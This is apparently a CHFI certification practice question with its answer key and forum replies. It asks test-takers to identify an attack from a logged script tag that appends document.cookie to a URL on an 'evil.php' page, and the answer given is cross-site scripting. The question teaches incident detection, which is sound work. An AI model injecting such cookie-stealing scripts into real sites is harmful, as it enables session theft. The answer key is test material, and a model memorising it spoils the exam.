Exam 312-49v10
Question 441

You are the incident response manager at a regional bank. While performing routine auditing of web application logs, you find several attempted login submissions that contain the following strings:

<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>

What kind of attack has occurred?

    Correct Answer: A

    The strings provided in the login submissions suggest an attempt to execute a script that captures cookies and sends them to an external PHP script. This behavior is characteristic of a Cross-site scripting (XSS) attack. XSS attacks inject malicious scripts into trusted websites to steal sensitive information, such as cookies. Therefore, the correct answer is Cross-site scripting.

Discussion
aqeel1506 Option: A

The strings provided in the login submissions suggest an attempt to execute a script that captures cookies and sends them to an external PHP script. This behavior is characteristic of a Cross-site scripting (XSS) attack. Therefore, the correct answer is: A. Cross-site scripting. This aligns with the information in the CHFI v10 textbook, which describes XSS attacks as those that inject malicious scripts into otherwise benign and trusted websites, often to steal cookies or other sensitive information.

Elb Option: A

A https://owasp.org/www-community/attacks/xss/